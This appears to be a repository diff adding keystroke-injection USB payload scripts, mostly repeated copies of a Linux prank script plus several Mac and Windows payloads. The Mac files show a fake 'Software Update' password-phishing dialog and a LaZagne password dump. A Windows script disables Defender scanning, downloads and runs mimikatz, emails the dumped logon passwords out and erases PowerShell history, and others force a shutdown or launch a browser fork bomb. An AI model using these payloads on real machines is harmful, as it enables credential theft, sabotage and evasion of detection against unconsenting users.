Quick payload deploy test

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer (4th copy).txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer (another copy).txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer (copy).txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer.txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/meow.txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Mac/Phish/Phish.txt

@@ -0,0 +1,49 @@
+#!/bin/bash
+#
+# Title:         Mac Password Phisher
+# Author:        Ahhh
+# Version:       1.0
+#
+# Prompts for user password, writes response to the bunny 
+#
+# Blue...............Starting
+# Amber..............Executing payload
+# Green..............Finished
+#
+
+LED B
+
+LANGUAGE='us'
+lootdir=loot/MacLoot
+
+# Gimme a Keyboard please. Thanks.
+ATTACKMODE HID STORAGE
+LED R G
+
+mkdir -p /root/udisk/$lootdir
+
+# Get a terminal
+QUACK DELAY 400
+QUACK GUI SPACE
+QUACK DELAY 300
+QUACK STRING terminal
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 400
+
+# Make lootdir
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/phish
+QUACK ENTER
+QUACK DELAY 200
+QUACK ENTER
+
+# Execute Payload
+QUACK STRING osascript -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" \& return \& return  default answer \"\" with icon 1 with hidden answer with title \"Software Update\"\'\>/Volumes/BashBunny/$lootdir/phish/pw.txt\; sleep 20\; killall Terminal\;
+QUACK ENTER
+QUACK DELAY 1000
+
+# Sync filesystem
+sync
+
+# Green is the official Light of "finished"
+LED G

Alex-Test/payloads/Mac/Recon/PasswordStealer.txt

@@ -0,0 +1,44 @@
+#!/bin/bash
+#
+# Title:         Mac Password Grabber
+# Author:        Overtimedev
+# Version:       1.0
+#
+# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass 
+# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
+#
+# Amber..............Executing payload
+# Green..............Finished
+#
+
+LED G R
+ATTACKMODE HID STORAGE
+
+lootdir=loot/MacPass
+mkdir -p /root/udisk/$lootdir
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 3000
+QUACK STRING cd /Volumes/BashBunny/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING python get-pip.py
+QUACK ENTER
+QUACK DELAY 3000
+QUACK STRING pip install -r requirements.txt
+QUACK ENTER
+QUACK DELAY 3000
+QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
+QUACK ENTER
+QUACK DELAY 10000
+QUACK STRING killall Terminal
+QUACK ENTER
+
+# Sync filesystem
+sync
+
+# Green LED for finished
+LED G

Alex-Test/payloads/Windows/Creds/SimpleUserPasswordGrabber.txt

@@ -0,0 +1,96 @@
+REM Title: windows password grabber
+REM Arthor makozort, https://github.com/makozort
+REM Target: windows 10 (with admin access), might work with windows 7 idk
+REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NO LIABLE FOR ANY MISUSE OF THIS SCRIPT
+REM --------------set default delay based on targets computer speed, 350 is around mid range (I think)
+DEFAULT_DELAY 350
+REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"
+DELAY 1000
+REM ------------open powershell as admin and set an exclusion path in the C:\Users path
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING Set-MpPreference -ExclusionPath C:\Users
+ENTER
+STRING exit
+ENTER
+REM -------------download mimikatz
+GUI r
+STRING cmd
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
+ENTER
+REM ------------run the following mimikatz commands and print results in new txt file
+DELAY 4000
+STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
+ENTER 
+STRING privilege::debug
+ENTER
+STRING sekurlsa::logonPasswords full
+ENTER
+STRING exit
+ENTER
+REM< --------- delete mimikatz
+STRING del %TEMP%\pw.exe
+ENTER
+STRING exit
+ENTER
+REM -------------email the pwlog.txt to your email
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING Remove-MpPreference -ExclusionPath C:\Users
+ENTER
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com', 'PASSWORDHERE');
+ENTER
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com'
+ENTER
+STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com')
+ENTER
+STRING $ReportEmail.Subject = 'Hello from the ducky'
+ENTER
+STRING $ReportEmail.Body = 'Attached is your duck report.' 
+ENTER
+STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
+ENTER
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+DELAY 4000
+STRING exit
+ENTER
+REM ------cleanup time
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+REM ----------delete the txt file
+STRING del c:\pwlog.txt
+ENTER
+REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations
+STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
+ENTER
+STRING exit
+ENTER
+REM ------lock the pc
+GUI l

Alex-Test/payloads/Windows/Creds/fastshutdown.txt

@@ -0,0 +1,7 @@
+WINDOWS R
+DELAY 250
+STRING cmd
+ENTER
+DELAY 300
+STRING shutdown /s /f /t 0
+ENTER

Alex-Test/payloads/Windows/Prank/Forkbomb.txt

@@ -0,0 +1,14 @@
+REM HTML Fork Bomb by Jonny Banana
+REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
+DELAY 2000
+CONTROL ESCAPE
+DELAY 200
+STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
+DELAY 200
+ENTER
+REM set a long delay to give time to this disgusting browser
+DELAY 1000
+REM it's time to enable Pop-Up
+TAB
+DELAY 200
+ENTER 

Alex-Test/payloads/Windows/Prank/Notepad.txt

@@ -0,0 +1,7 @@
+REM The next four lines open Notepad in Windows and type "Hello World"
+WINDOWS R
+DELAY 250
+STRING notepad
+ENTER
+DELAY 250
+STRING Hello World